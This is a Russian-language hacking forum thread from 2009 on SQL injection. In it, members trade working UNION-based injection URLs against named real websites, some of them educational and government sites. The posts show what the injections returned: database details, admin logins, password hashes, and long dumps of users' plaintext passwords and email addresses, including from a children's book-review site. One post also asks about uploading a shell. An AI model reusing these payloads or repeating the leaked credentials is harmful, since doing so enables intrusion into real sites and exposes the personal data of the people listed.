SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://skivacationhouse.com/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20SELECT%201,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

    admin>49ba6d17550da5f53c5e5c8b741c1993> (PID: 1)

    http://www.vivavilla.nl/index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20SELECT%201,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

    admin>c2e4327c0ed6d23227be395b77b0272e> (PID: 1)
     
  2. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.cds.edu/php/facultyProfile.php?categoryId=162+and+substring(version(),1,1)=5

    PR 6

    -------

    http://briz-info.com/sanatorium.php?p=1+and+substring(version(),1,1)=5
     
    #9602 AlexSatter, 4 Jun 2009
    Last edited: 4 Jun 2009
    1 person likes this.
  3. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.city.vbg.ru/index.php?id=-566%20union%20select%201,2,version(),4,5,6,7,8/*

    4.0.12
     
    #9603 Kimliksiz, 4 Jun 2009
    Last edited by a moderator: 4 Jun 2009
  4. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    sao@chicken
    4.1.12
    sao


    Kimliksiz
    а теперь на русский плиз

    сорри за оффтоп, потом кильну мессагу
     
  5. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    Ebs

    http://www.site.com
     
    #9605 Kimliksiz, 4 Jun 2009
    Last edited: 1 Jul 2009
  6. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.shtypidites.com/lajmet.php?id=540+and+1=2+union+all+select+1,2,3,4,5,concat(emri,char(58),fjalkalimi)+from+admin/*

    http://www.tifozatkuqezi.com/sporti-lajme.php?id=3856+and+1=2+union+all+select+1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12+from+cube_store_con fig/*
     
    #9606 Kimliksiz, 4 Jun 2009
    Last edited by a moderator: 4 Jun 2009
  7. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.phcqa.org/reports/hospital/historical.php?id=390256&measure_id=-5001+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

    5.0.32-Debian_7etch8-log:dataphcqa@localhost:dataphcqa
    PR 5
     
  8. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://www.provisor.com.ua/
    provisor_webuser@localhost
    provisor_main
    5.0.77-community-log


    Таблы огромным списоком
    Юзеры форума
    Очень огромная база юзерей правда захешеная, все на одной странице
    PR5

    http://www.chaykafest.com/
    u_chaykafest@localhost
    chaykafest
    4.1.22


    http://sommelier-news.com

    vadim_anons@localhost
    5.0.22
    vadim_anons


    Юзеры списком
    Юзеры списком 2(админы)
    http://sommelier-news.com/news.php?ch=id&id=-1014'+UNION+SELECT+0,concat_ws(0x0b,passw,login,admin),2,3,4,5,6,7,8,9,10,11,12,13+FROM+auth_users+%23&to_ch=all&type=2


    Админка
    Логин: ТакойЖеКакИПас
    Пасс: 330

    "админ на англ" - защита от Турков ))
     
    #9608 udman, 4 Jun 2009
    Last edited: 4 Jun 2009
    1 person likes this.
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR 5, ТИЦ 475
    http://www.model-357.ru/show.php?id_a=64+and+substring(version(),1,1)=4

    http://webmvc.com/show/show.php?sec=10&art=-3+union+select+1,version(),3,4
    4.0.24_Debian-10sarge1-log

    PR 4, ТИЦ 950
     
    #9609 AlexSatter, 4 Jun 2009
    Last edited: 4 Jun 2009
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.oissp.org/news/news_full.php?id=-1+union+select+1,2,3,concat(table_name),5,6+from+information_schema.tables+--+

    http://consumerlady.com/news_full.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+--+

    http://ford.renessans.ru/news_full.php?id=-1+union+select+1,2,concat_ws(0x3a3a,username,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users+/*+
    admin::$1$WE$fFPL1qCgvP8kQ5xlKUW3R/

    http://prsnso.siberia.net/index.php?rub=page&id=-6+union+select+1,concat_Ws(0x3a3a,login,pass)+from+users+limit+2,1+--+
    soran::821936
    Админку не нашёл(

    http://turakovo.ru/news_full.php?nr=1&id=-1+union+select+name+from+user+--+
    Администратор - вывод в title

    http://www.metalside.pl/news/news_full.php?id=1+union+select+concat(table_name)+from+information_schema.tables+limit+34,10+--+
    phpbb_users
     
    #9610 DezMond™, 4 Jun 2009
    Last edited: 4 Jun 2009
    2 people like this.
  11. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Торговое обoрудования>>
    Code:
    http://kvazar.ru/price_new.htm?group_id=-1+union+all+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7--+
    Code:
    http://kvazar.ru/admin/ - бейсик авторизация
    5.0.51a-community:*:db_kvazar1:*:kvazar1@localhost:*:redhat-linux-gnu
     
    1 person likes this.
  12. ANUBI$

    ANUBI$ Active Member

    Joined:
    16 Jan 2009
    Messages:
    57
    Likes Received:
    104
    Reputations:
    1
    ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables

    ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,coNCAT_ws(chAR(42,32,42),user(),database(),version()),3,4,5,6,7,8,9
    dbsun@localhost* *sunriseindustries* *5.0.45
     
    2 people like this.
  13. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Вот SQl-ing, в принципе популярный TOP рейтинг wap сатов

    http://vloge.ru/outtop.php?uid=-238+union+select+1--
    superadmin --------------------------------
    http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x737570657261646d696e

    (ID:login:md5(pass))
    1:XuiVamVrot:50bcb34ab2fc85e6738ec9e6625f2b3d

    ЗЫ: Логин меня убил :D , кто сможет расшифровать пароль, скинте в ЛС пожалуйсто
    --------------------------------------
    users---------------------------------
    http://vloge.ru/outtop.php?uid=-238+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+30,1--
    Таблицы
    http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x7573657273--
    (uid site_name link email info razdel date pass type(9) typeStat vip

    Юзеры: крутим лимитом

    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+11,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+40,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+60,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+60,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+90,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass,email)+from+users+limit+100,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass,email)+from+users+limit+160,1--
    http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pass,email)+from+users+where+uid=254--

    можно ли туда шел залить?
     
    #9613 SeNaP, 4 Jun 2009
    Last edited: 4 Jun 2009
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    PR 5, edu

    PHP:
    http://info.phys.unm.edu/people/index.phtml?pid=151'+union+select+1,2,3,4,5,6,7/*
    User: [email protected]
    Version: 4.1.22
    Dbname: panda
     
    1 person likes this.
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.mixomat-recordings.de/news.php?action=read&id=1'+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4+--+

    4.0.25-Max-log:v135343:v135343@localhost
     
    _________________________
    1 person likes this.
  16. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    162
    Likes Received:
    131
    Reputations:
    73
    DATABASE - web147db1
    VERSION - 5.0.67
    USER - web147u1@localhost
    @@VERSION_COMPILE_OS - suse-linux-gnu

    вот и таблица :

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+24,1--+

    вот и юзеры

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20,pass,name),7,8,9,10+from+user--+

    http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20,pass,name),7,8,9,10+from+user+limit+6,3--+

    пасс - kikula
    юзер - devi
    но они не подходят к админке там их переберать надоело их там тьма, может кому и повезет

    http://mymakler.ge/admin/
     
  17. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.spaghettibookclub.org/student.php?student_id=-5151+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15
    5.0.77-community-log
    Pr 5

    структура БД
    Code:
    Database [spaghett_bookclub]
        Table [spb_access_type  ( Rows)]
            access_type_id
            name
        Table [spb_account_type  ( Rows)]
            account_type_id
            name
        Table [spb_author  ( Rows)]
            author_id
            last_name
            first_name
        Table [spb_book  ( Rows)]
            book_id
            title
            alpha_title
            author_id
            illustrator
            publisher
            pages
        Table [spb_book_genre_xref  ( Rows)]
            book_genre_id
            book_id
            genre_id
        Table [spb_book_theme_xref  ( Rows)]
            book_theme_id
            book_id
            theme_id
        Table [spb_class  ( Rows)]
            class_id
            clubhouse_active
            school_id
            school_year
            name
            color_schema_id
            teacher_lname
            teacher_fname
            teacher_hon
            teach_name
            status
            grade_level
            grade_level2
            signup_date
            expire_date
            completion_status
            prog_desc
            paid_for_reviews
            payment_recieved
            payment_note
            sponsor
            new
            alt_grade_desc
            direct_image_upload
            sponsor_image_id
            class_size
            teach_title
            teach_phone
        Table [spb_class_access  ( Rows)]
            class_access_id
            class_id
            access_type_id
        Table [spb_color_schema  ( Rows)]
            schema_id
            name
            bg_color
            text_color
        Table [spb_genre  ( Rows)]
            genre_id
            name
        Table [spb_image  ( Rows)]
            image_id
            extension
            name
        Table [spb_image_assoc  ( Rows)]
            assoc_id
            image_id
            critic_id
            group_id
        Table [spb_member  ( Rows)]
            member_id
            critic_id
            group_id
            grade
            image_id
        Table [spb_member_review_xref  ( Rows)]
            member_review_id
            review_id
            member_id
            screen_name
            age
            city
            state
        Table [spb_multigroup  ( Rows)]
            multi_id
            student_id1
            student_id2
        Table [spb_publisher  ( Rows)]
            publisher_id
            name
        Table [spb_review  ( Rows)]
            review_id
            class_id
            book_id
            image_id
            status
            creation_date
            editable
            review_text
            grade1
            grade2
        Table [spb_review_revision_xref  ( Rows)]
            review_id
            revision_id
        Table [spb_revision  ( Rows)]
            revision_id
            revision
        Table [spb_school  ( Rows)]
            school_id
            group_type_id
            url
            name
            address1
            address2
            city
            state
            zipcode
            district
            phone
            principal
            color_schema_id
            status
            image_id
            note
            new
            country
            sponsor
            sponsor_image_id
        Table [spb_session  ( Rows)]
            session_id
            code
            user_id
            last_access
        Table [spb_student  ( Rows)]
            student_id
            class_id
            first_name
            last_name
            screen_name
            birthday
            email
            color_schema_id
            portrait_id
            gender
            consent
            city
            state
            grade
        Table [spb_student_restore  ( Rows)]
            student_id
            class_id
            first_name
            last_name
            screen_name
            birthday
            email
            color_schema_id
            portrait_id
            gender
            consent
        Table [spb_student_review_xref  ( Rows)]
            student_review_id
            student_id
            review_id
        Table [spb_theme  ( Rows)]
            theme_id
            name
        Table [spb_user  ( Rows)]
            user_id
            username
            password
            last_name
            first_name
            honorific
            email
            account_type_id
            sub_type_id
            status
            classroom_id
            school_id
            group_id
            individual_id
            family_id
        Table [state  ( Rows)]
            abbr
            name
    юзеры и пассворды:
    Code:
    [0]:1:julie:topaz
    [1]:2:mattison:cunnilingus
    [2]:736:tamrunr:tamrunr
    [3]:4:staff person:staff
    [4]:829:dsalewski:prejs
    [5]:7:julieann:teacher
    [6]:801:bmiles:olive79
    [7]:719:elsevier:recares
    [8]:865:sundaytest:sundaytest
    [9]:826:smorlan:stobildn
    [10]:916:cruzm01:cruzm01
    [11]:22:school1:school2
    [12]:892:Dione:johnmayer
    [13]:738:juliesddff:jluiesdf
    [14]:1036:mtest:cunnilingus
    [15]:1001:dogs:drool
    [16]:873:aflores:lolita67
    [17]:35:tlc:marcya1
    [18]:36:school:school
    [19]:922:jesslura:jesslura1
    [20]:38:armory:summer
    [21]:517::
    [22]:40:jr:afterschool
    [23]:41:mike:pickering
    [24]:523::
    [25]:860:test:test
    [26]:867:est51er:jeanne
    [27]:902:bsandford:brooks
    [28]:942:suneedai:psalm233
    [29]:64:rosemarin:ann
    [30]:869:dude:dude
    [31]:594:murray:murray
    [32]:929:mpgrantham:mpgrantham
    [33]:841:edwardscl:Benson
    [34]:912:skpatters:k50k50
    [35]:640:nycares:spring09
    [36]:906:may9july:1294
    [37]:911:ubarrera:fall
    [38]:828:lgteach:dozie1
    [39]:878:lonkhan:shanda35
    [40]:817:nycares1:spring1
    [41]:930:henzdawn:dhphdh
    [42]:835:wildwoodms:warriors
    [43]:522::
    [44]:807:metropt2:4467
    [45]:737:dleipsic:dleipsic
    [46]:734:kprice:touchstone
    [47]:924:maddog:maddog6
    [48]:910:kellkamm:red2468
    [49]:568::
    [50]:904:pettitt:pettitt
    [51]:834:weaver:#48winner
    [52]:856:asdfXX:asdfXX
    [53]:920:benji:ell2
    [54]:880:mitchell:mitchell5
    [55]:862:rakina81:tiakari
    [56]:395:bethjnj:ethel
    [57]:866:pams:2123
    [58]:382::
    [59]:381::
    [60]:380::
    [61]:135:ClassGuest:password
    [62]:845:lkoertzen:owenmeany
    [63]:861:jenmatsuno:jen725
    [64]:836:nighthawk:common
    [65]:891:thomasb16:honeybee
    [66]:844:metrobapt:4464
    [67]:852:ksalmon:blue21
    [68]:851:jclaessens:gojillgo
    [69]:859:forgetme:forgetme
    [70]:918:sinman:keeley00
    [71]:883:mpierce:beach
    [72]:864:tstafford:tomboy
    [73]:452:Barb:amberK
    [74]:914:dawnblad:45744
    [75]:888:wwinchel:magoo
    [76]:839:avaldez:hulkster
    [77]:379::
    [78]:884:weitzmac:hannah
    [79]:712:MrsSerna:saja
    [80]:561::
    [81]:877:stagrade1:firstgrade
    [82]:895:juliefour:Elliottr4
    [83]:838:Suzwoo:stwenc76
    http://digitalmedia.massey.ac.nz/exposure/student.php?id=6+and+substring(version(),1,1)=5

    PR 5

    http://www.impacttest.com/doctor.php?id=-2911+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/*

    Database Version: 4.1.22-standard
    Database name: impact_impacttest
    User name: impact_impact@localhost


    нашел таблицу users. поле username подобрал, где хранится пароль.. нет. юзеры:
    mawheatley
    test
    impact
    workshops
     
    #9617 AlexSatter, 5 Jun 2009
    Last edited: 5 Jun 2009
  18. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password)+from+mysql.user+--+
     
  19. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR1, ТИЦ 10
    http://videotor.com/raz.php?a=2&id_them=-110+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64)

    Database Version: 5.0.45
    Database name: videotor_blog
    User name: videotor@localhost


    Структура БД

    Code:
    Database [videotor_blog]
        Table [coment  ( Rows)]
            id_user
            id_post
            id_coment
            coment
            date_time
            sec_post_coment
        Table [favorit  ( Rows)]
            id_user
            id_post
        Table [post  ( Rows)]
            name
            id_user
            id_post
            anons
            url
            reiting
            id_them
            date_post
            time_post
            sec_post
            key_words
            dlitel
            resol
            size
            flag
            count
        Table [reiting  ( Rows)]
            id_user
            id_post
        Table [them  ( Rows)]
            id_them
            name
            opis
            key
        Table [users  ( Rows)]
            name
            surname
            login
            password
            id_user
            mail
            reiting
            brith_day
            home_url
            icq
            about
            lang
            photo
            stat
            last_time
            last_date
            sesionid
            last_time_sec
            schet
    юзеры и пассы в виде: name,surname,login,password,id_user,mail

    Code:
    0]:Content:Manager:Bot:ghbpthdfnbd:1:[email protected]
    [1]:Вячеслав:Васильченко:Slayer:COUNTer:2:[email protected]
    [2]:Олег:Терновой:oleg:ghbpthdfnbd:100:[email protected]
    [3]:Sergey:Ternovoy:sergey:kiskis:101:[email protected]
    [4]:Антон:Щербаков:anton:kiskis:102:[email protected]
    [5]:kisa:kisa:kisa:kiskis:103:[email protected]
    [6]:юра:киевлянин:yrak:070962:104:[email protected]
    [7]:Женя:А:Jan0000:0000:105:[email protected]
    [8]:МИша:Мишин:Bobennes:1:106:[email protected]
    [9]:Наталья:Гюнтер:brigit:12345:107:[email protected]
    [10]:Роман:ЕГоров:dogs:re20do06:108:[email protected]
    [11]:Vlad:Vladq:abap44:viking01:109:[email protected]
    [12]:K.:K:K-9:1247004:111:[email protected]
    [13]:ig:ma:dichovsky:42:112:[email protected]
    [14]:sergey:zu:serg5555555:7030604:113:[email protected]
    [15]:Андрей:А:aasn:alexdll:114:[email protected]
    [16]:Олег:Владимиров:Arboozz:ФЫВАПР:115:[email protected]
    [17]:Вал:Мороз:morozval:zenith:116:[email protected]
    [18]:Алексей:Смородский:еблотрон:719winston:117:[email protected]
    [19]:r126:r126:r126:wert:118:[email protected]
    [20]:dasha:karaeva:dashak:8706885137:119:[email protected]
    [21]:Ник:Сух:korvin:nics1983:120:[email protected]
    [22]:Raul:Blanco:Raul:900raul7:121:[email protected]
    [23]:Oleg:mydrik:Svityashko:170786:122:[email protected]
    [24]:Aleks:Yn:a1eks:421374:123:[email protected]
    [25]:Sarma:Extreme Tours:sarma:kolonel:124:[email protected]
    [26]:Yury:v:yuryvik:1beavis:125:[email protected]
    [27]:Андрей:Данилов:Anh:9162719595:126:[email protected]
    [28]:САША:В:VIG13:130482:127:[email protected]
    [29]:Серж:Иванов:qwertyus:94519121970:128:[email protected]
    [30]:Олег:Константинов:Sheff:wynnedes:129:[email protected]
    [31]:Кудрин:Виктор:avalon_1984:652819:130:[email protected]
    [32]:livon2000:livonov:livon2000:1571524572:131:maga-maga2000
    [33]:Алексей:Храпский:aleks101:EVd-E3a_:132:[email protected]
    [34]:Ermolin:Andrey:EagleNN:qazxsw:133:[email protected]
    [35]:izz:zx:izz:138fuckoff:134:[email protected]
    [36]:Denis:Denisoff:rasputin2kiss:qwertyuiop:135:[email protected]
    [37]:Fenriz:Liendmann:Fenriz:562883091:136:[email protected]
    [38]:Alex:Cast:Redox:qazxcvbnm:137:[email protected]
    [39]:hayot.org:hayot.org:hayot.org:hayot.org:138:[email protected]
    [40]:Dom:Numa:LoL:zxcvbnm:139:[email protected]
    [41]:Alexey:Lee:Alee:710447:140:[email protected]
    [42]:1:2:SatanKlaus:123321:141:[email protected]
    [43]:Oleg:Oleg:98-1:djam98:142:[email protected]
    [44]:kosandre:kosandre:kosandre:13611361:143:[email protected]
    [45]:Руслан:Шкаликов:Jackas:vfhbyf:144:[email protected]
    [46]:Serega:Golubec:serega_killer:111111:145:[email protected]
    [47]:Emil:Rakhimov:mildox:not1found:146:[email protected]
    [48]:Alexandr:Smirnov:jh8185g:232jx8185g:147:[email protected]
    [49]:Yura:My:yurami:i6766xsh:148:[email protected]
    [50]:Gustav:Gustavson:Gustav:dublin:149:[email protected]
    [51]:Andrew:Otvertka:Otvertka:3213123:150:[email protected]
    [52]:олег:макаров:mccarov:4261914:151:[email protected]
    [53]:Михаил:Дозвонов:shitmaker:fuckda1038:152:[email protected]
    [54]:Paata:Tsiwtsiwadze:ipaata:123456789:153:[email protected]
    [55]:Иван:Иваныч:miner:911:154:[email protected]
    [56]:A:S:ReDragon:oo28954:155:[email protected]
    [57]:push:brush:push_brush:ub99875:156:[email protected]
    [58]:Alexander:Lesnyakov:AlexCult:videotor:157:[email protected]
    [59]:Владимир:Прагматов:Sworog:pragmaticorama:158:[email protected]
    [60]:vitalii:ishenko:piet:7063282869:159:zugres@mail/
    
    etc...
    -------------

    http://www.vykihendy.com/raz.php?id=-50+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6/*

    Database Version: 5.0.51a-log
    Database name: vykidb
    User name: vykihendy@localhost


    -------------
    PR 2, ТИЦ 20
    http://www.eldis-holding.ru/raz.php?id_raz=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),11,12/*

    Database Version: 4.1.22-log
    Database name: eldisho3_eldis
    User name: eldisho3@localhost


    Есть таблица admin, нашел два поля: id, password
    3 записи.

    -------------
    PR 7
    http://www.iett.gov.tr/sss.php?id=14+and+substring(version(),1,1)=5
    ------------

    http://www.mappn.com/soft.php?id=2+and+substring(version(),1,1)=5
    ------------
    http://www.dood.ru/soft.php?id_producer=-54+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8/*

    Database Version: 4.1.22-standard
    Database name: dood_gsms
    User name: dood_admin@localhost
    ------------
    PR 5

    http://www.longfordceb.ie/news/index.php?catid=19&subid=1&nid=-39+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2/*

    Database Version: 5.0.45-community-log
    Database name: paulgre_ceb
    User name: [email protected]
     
    #9619 AlexSatter, 5 Jun 2009
    Last edited: 5 Jun 2009
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    PR 5
    http://www.peppermint-jam.de/newb/news.php?id=-1+union+select+1,2,concat_Ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--&lang=en&lang=en

    booking@localhost:pjcmsb:5.0.32-Debian_7etch8-log
     
    _________________________
Thread Status:
Not open for further replies.